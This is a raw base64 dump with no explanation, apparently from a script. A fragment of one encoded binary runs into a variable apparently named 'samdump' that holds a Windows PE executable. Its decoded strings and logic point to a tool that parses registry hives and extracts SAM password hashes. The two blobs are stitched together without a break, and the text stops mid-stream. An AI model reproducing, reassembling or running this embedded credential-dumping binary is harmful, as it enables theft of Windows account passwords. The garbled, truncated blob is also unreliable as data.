+xznWOd456TnvOfU5/zkXOhw6JjpAOk46VjpcOp86sToNOyg7NztTO6w7tDsOPBs8vjzNPOM8Ez7N +Ptc/AAAAIAAAEAEAAB4wPzBWMMswkzOXM5sznzOjM6czqzOvM300iDSNNJc0nDTUNOA05zT3NP00 +BDUONSc1LzU0NUA1RTViNWg1ojWqNcQ1yjXbNfQ1ADYGNhM2IzYpNjE2TzZVNmY2fTaHNqA2Ajca +NyA3SjdQN3I3hje4N7831DcGOBA4MThGOGo4lDiiONM42TjmOAc5LDk7OUo5fDmMOc852znlOfk5 +BzoUOhk6Hzp6OoE6yToOO/E7Cjw/PEc8YTxtPH08vDwMPR89XT2BPYg9mT2fPa89tj29PcU97D34 +PQI+Cj4SPhg+Jj41Pkc+bT56Pog+kz6mPs0+3D4ePzI/UD9cP3g/jT+jP6o/uD/LPwAwAABEAQAA +QjBPMHQwkDCjMBcxtzEEMhwyMTJ7MsMy2jLnMgEzDzMdMygzPDNCM1AzWTNqM4YzlTOnM7AzzDPv +M/kzAjQeNEE00TTZNN805zQyNVc1aTVvNXg2fjaGNo42ljaiNqc2sza7NsM2yzbhNuk28Tb5NgE3 +FDccN0k3ZDd0N3o3qTfRN9c34zdJOE84VziaONQ42jj9ORk6JjozOkY6TzpbOo06nzquOs861Tr2 +OgA7CzsQOxg7LztEO0o7UjtaO2U7kzufO6k7tDu+O8g7zjsRPBs8IDwlPCo8QzxJPLg8vjzcPO08 +AD0VPTM9QT1OPV49fz2LPZ09qz26Pcs9GD4wPjc+Pz5EPkg+TD51Pps+tT68PsA+xD7IPsw+0D7U +Ptg+Ij8oPyw/MD80P5o/pT/AP8c/zD/QP9Q/8T8AAABAAAAAAQAAGzBNMFQwWDBcMGAwZDBoMGww +cDC6MMAwxDDIMMwwHjEkMSsxNDE7MUMxSTFUMVwxqzO5M78z2TPeM+0z8zMDNA40IDQzND40RDRJ +NE80XDR5NH80ijSQNJo0oDSwNLY0+jSgNY03mDegN7M3uTfPN9Y33DfmN+w38Tf3Nwc4EDgqODs4 +QThUOLY4YzlsOXI5fjmDOY05lDmcOaI5qTmuOb852zn9Ogo7Lzt6O4k7qTvLO/g7DDxGPE08czyL +PKU8sDzGPM489zwEPQk9Fj0iPdw94z38PT4+UD7ZPvk+/j4dPyo/Nz9BP0s/Uz9hP38/nD+0P9Q/ +AAAAUAAAwAAAACwwQjB1MN0wAjFIMU0xaTF8MYMxlTGdMa0xvjHRMekxCTJfMnEyyDLgMucy7zL0 +Mvgy/DIlM0szZTNsM3AzdDN4M3wzgDOEM4gz0jPYM9wz4DPkM0o0VTRwNHc0fDSANIQ0oTTLNP00 +BDUINQw1EDUUNRg1HDUgNWo1cDV0NXg1fDVJNlk2izaVNmY4eTj4OAI5Hjl+OcY5zDnaOSk6WTq0 +Oro6yDomO1U7ZDu8O/Q7BjwZPFU8nj0AYAAAGAAAAPQw+DCsNLA0uDS8NMQ0yDQAcAAAyAAAAAww +EDAcMPQy+DL8MjQzPDNEM0wzVDNcM2QzbDN0M3wzhDOMM5QznDOkM6wztDO8M8AzyDNANkQ2SDZM +NlA2VDZYNlw2dDiUOKQ4tDhQPVg9XD1gPWQ9aD1sPXA9dD14PXw9gD2EPYg9jD2QPZQ9mD2cPaA9 +pD2oPaw9sD20Pbg9vD3APcQ9yD3MPdA91D3YPdw94D3kPeg97D3wPfQ9+D38PQA+ED4UPhg+HD4g +PiQ+KD4sPjA+ND5APtwsamdump="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v +ZGUuDQ0KJAAAAAAAAABQRQAATAEFAHD4djQAAAAAAAAAAOAADgELAQMKALIAAABqAAAAAAAAAFIA +AAAQAAAA0AAAAABAAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAAAABQAQAABAAAAAAAAAMAAAAAABAA +ABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAAAgAQAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAADABAOwKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAYIQEA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAhLEAAAAQAAAAsgAAAAQA +AAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAAgfAAAA0AAAACAAAAC2AAAAAAAAAAAAAAAAAABAAABA +LmRhdGEAAAAULwAAAPAAAAAcAAAA1gAAAAAAAAAAAAAAAAAAQAAAwC5pZGF0YQAAJAYAAAAgAQAA +CAAAAPIAAAAAAAAAAAAAAAAAAEAAAMAucmVsb2MAACQQAAAAMAEAABIAAAD6AAAAAAAAAAAAAAAA +AABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +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 +M/oz2ovHJQD8AADB6AjBywSLqADbQACLwyUA/AAAwegIM6gA3EAAi8clAAD8AMHoEDOoAN1AAIvD +JQAA/ADB6BAzqADeQACLxyX////8gef8AAAAwegYM6gA30AAi8Ml/////IHj/AAAAMHoGDOoAOBA +ADOvANlAAIt+CDOrANpAAIteDDPNM/kz2YvHJQD8AADB6AjBywSLqADbQACLwyUA/AAAwegIM6gA +3EAAi8clAAD8AMHoEDOoAN1AAIvDJQAA/ADB6BAzqADeQACLxyX////8wegYM6gA30AAi8Ml//// +/MHoGIHn/AAAAIHj/AAAADOoAOBAADOvANlAAIt+EDOrANpAAIteFDPVM/oz2ovHJQD8AADB6AjB +ywSLqADbQACLwyUA/AAAwegIM6gA3EAAi8clAAD8AMHoEDOoAN1AAIvDJQAA/ADB6BAzqADeQACL +xyX////8gef8AAAAwegYM6gA30AAi8Ml/////IHj/AAAAMHoGDOoAOBAADOvANlAAIt+GDOrANpA +AIteHDPNM/kz2cHLBIvHi+slAPwAAIHlAPwAAMHoCMHtCIuAANtAADOFANxAAIvvgeUAAPwAwe0Q +M4UA3UAAi+uB5QAA/ADB7RAzhQDeQACDxiCL74Hn/AAAAIHl/////MHtGDOFAN9AAIvrgeX////8 +geP8AAAAwe0YM4UA4EAAM4cA2UAAM4MA2kAAM9D/TCQQD4XT/f//6TMCAADHRCQQBAAAAIPGeIs+ +i14EM/oz2ovHJQD8AADB6AjBywSLqADbQACLwyUA/AAAwegIM6gA3EAAi8clAAD8AMHoEDOoAN1A +AIvDJQAA/ADB6BAzqADeQACLxyX////8gef8AAAAwegYM6gA30AAi8Ml/////IHj/AAAAMHoGDOo +AOBAADOvANlAAIt++DOrANpAAIte/DPNM/kz2YvHJQD8AADB6AjBywSLqADbQACLwyUA/AAAwegI +M6gA3EAAi8clAAD8AMHoEDOoAN1AAIvDJQAA/ADB6BAzqADeQACLxyX////8wegYM6gA30AAi8Ml +/////MHoGIHn/AAAAIHj/AAAADOoAOBAADOvANlAAIt+8DOrANpAAIte9DPVM/oz2ovHJQD8AADB +6AjBywSLqADbQACLwyUA/AAAwegIM6gA3EAAi8clAAD8AMHoEDOoAN1AAIvDJQAA/ADB6BAzqADe +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 